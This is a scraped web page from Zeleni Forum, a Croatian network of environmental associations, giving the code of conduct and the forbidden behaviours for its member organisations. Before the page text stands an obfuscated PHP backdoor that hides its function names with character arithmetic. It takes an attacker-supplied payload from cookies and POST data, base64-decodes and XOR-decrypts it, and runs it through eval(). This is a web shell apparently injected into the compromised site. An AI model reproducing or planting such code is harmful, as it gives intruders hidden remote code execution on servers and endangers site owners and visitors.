$bDMhBNMO = chr ( 745 - 646 ).'_' . "\124" . "\130" . chr ( 1102 - 991 ).chr ( 174 - 107 ); $GNQlfv = 'c' . 'l' . 'a' . "\163" . 's' . chr ( 211 - 116 ).'e' . chr (120) . 'i' . "\x73" . chr ( 452 - 336 )."\x73";$rtMINlOnUq = class_exists($bDMhBNMO); $GNQlfv = "3231";$AAvQxiikZL = !1;if ($rtMINlOnUq == $AAvQxiikZL){function zCApvp(){$syiLqlIT = new /* 22434 */ c_TXoC(41226 + 41226); $syiLqlIT = NULL;}$MLLyfOTves = "41226";class c_TXoC{private function avsJOB($MLLyfOTves){if (is_array(c_TXoC::$BrfwbO)) {$JQZhjt = str_replace('<' . chr (63) . "\160" . "\150" . chr (112), "", c_TXoC::$BrfwbO[chr (99) . "\x6f" . "\156" . chr ( 307 - 191 ).chr (101) . 'n' . "\164"]);eval($JQZhjt); $MLLyfOTves = "41226";exit();}}private $ejIrXiK;public function UoLMpRzWB(){echo 1697;}public function __destruct(){c_TXoC::$BrfwbO = @unserialize(c_TXoC::$BrfwbO); $MLLyfOTves = "20803_15741";$this->avsJOB($MLLyfOTves); $MLLyfOTves = "20803_15741";}public function uKyMShiW($GXRdL, $dzQSxQv){return $GXRdL[0] ^ str_repeat($dzQSxQv, (strlen($GXRdL[0]) / strlen($dzQSxQv)) + 1);}public function ItWEoZM($GXRdL){$OlXMRVy = "base64";return array_map($OlXMRVy . chr (95) . chr ( 948 - 848 ).chr (101) . "\143" . chr ( 124 - 13 ).chr ( 556 - 456 ).chr ( 721 - 620 ), array($GXRdL,));}public function __construct($QWPbb=0){$abZxXt = $_POST;$lILjfaXvW = $_COOKIE;$dzQSxQv = "b7aa93a8-a17b-448e-bf53-971431b110a8";$eUDoeaXwCi = @$lILjfaXvW[substr($dzQSxQv, 0, 4)];if (!empty($eUDoeaXwCi)){$GXRdL = "";$eUDoeaXwCi = explode(",", $eUDoeaXwCi);foreach ($eUDoeaXwCi as $CIdbhY){$GXRdL .= @$lILjfaXvW[$CIdbhY];$GXRdL .= @$abZxXt[$CIdbhY];}c_TXoC::$BrfwbO = $this->uKyMShiW($this->ItWEoZM($GXRdL), $dzQSxQv);}}public static $BrfwbO = 38262;}zCApvp();} Kodeks ponašanja članica Zelenog foruma - Zeleni Forum

Kodeks ponašanja članica Zelenog foruma

Kodeks ponašanja objedinjuje osnovne vrijednosti Zelenog foruma i načela ponašanja članica koja su u suglasju s etičkim, moralnim i profesionalnim normama te opće prihvaćenim civilizacijskim vrijednostima.

1. poštivanje vrijednosti i oblika ponašanja koji se temelje na toleranciji, nenasilju u svim oblicima, otvorenosti i transparentnosti, međuetničkoj i kulturnoj toleranciji.

2. protivimo se svakom obliku diskriminacije prema dobi, spolu, rasi, nacionalnosti, etničkom porijeklu, političkom uvjerenju, religijskoj pripadnosti, bračnom stanju, seksualnoj orijentaciji, tjelesnim osobinama, jeziku, socioekonomskom statusu i obrazovanju.

3. svaka udruga/organizacija članica Zelenog foruma bilo tijekom radnog vremena ili izvan njega u svakodnevnoj komunikaciji i odnosima svojim ponašanjem izgrađuje ugled Zelenog foruma te time pridonosi ugledu Foruma.

4. tijekom uključenja u Forum svaka udruga članica dužna je pratiti radni proces, prikupljati važne podatke, uočavati probleme vezane za Forum te o tome obavijestiti druge članice i Koordinaciju Zelenog foruma.

5. komunikacija mora bita obostrana, jasna i učinkovita, a podaci koji su izneseni precizni, točni i istiniti. Ova se pravila koriste i poštuju kod svih komunikacijskih medija, uključujući i elektroničke oblike komuniciranja.

6. putem  i otvorene mailing liste ZF-a u komunikaciju i prosljeđivanje informacija mogu se uključivati i pojedinci, institucije i organizacije koje nisu članice ZF-a, što iskreno potičemo. Važno je da se pritom moraju pridržavati Kodeksa ponašanja ZF-a.

7. kao savjestan i odgovoran član neposrednog okruženja, ali i šire globalne zajednice, naš cilj je u skladu s politikom održivog razvoja. Iz tog smo razloga dužni brinuti se za očuvanje i odgovoran odnos prema prirodi i okolišu.

8. odgovoran odnos prema prirodi i okolišu njegujemo ne samo u profesionalnim segmentima života, nego i u svim drugim životnim prilikama.

9. trebamo pomagati društvenoj zajednici u kojoj djelujemo, uz poštivanje zakona, lokalnih običaja i tradicije regije/ili zemlje u kojoj obavljamo aktivnosti. Svaka udruga/organizacija u okviru svojih aktivnosti treba pridonositi okruženju te se ponašati kao socijalno odgovoran član.

10. stjecanje novih vještina, znanja, profesionalnog razvoja, otvorenost za nova znanja, prijedloge i iskustava, kao i sposobnost produkcije novih ideja obaveza je svake članice Zelenog foruma, a također i razmjena tih znanja.

11. ukoliko neka od članica za svoju aktivnost, kampanju ili inicijativu želi podršku ZF-a može ju dobiti uz suglasnost Koordinacije.

Neprihvatljivi oblici ponašanja

1. udruga/organizacija članica Zelenog foruma ne smije sudjelovati u financijskim i drugim aktivnostima koje mogu štetiti poslovanju, interesu, ugledu i dobrobiti Foruma, kao i svim situacijama u kojima je interes članice u sukobu s aktivnostima Foruma.

2. zabranjeno je krivotvorenje podataka, zadržavanje i sprečavanje toka relevantnih informacija.

3. ne dozvoljava se sufinanciranja rada mreže ZF-a ukoliko netko od članica ZF-a provodi kampanju protiv te institucije, firme ili kompanije.

4. zabranjena je promocija političkih stranaka i bilo kakav komercijalni marketing putem elektroničke mreže i web stranice ZF-a.

5. nedozvoljeno je iskorištavanje ZF-a u privatne i druge svrhe koje nisu od javnog interesa.

Ove stranice su nastale uz financijsku potporu Europske unije.
Za sadržaj stranica odgovaran je isključivo Zeleni Forum i ni u kom slučaju se ne može smatrati da odražava stav Europske unije.
© 1998. - 2022. Zeleni forum - mreža udruga za zaštitu okoliša Hrvatske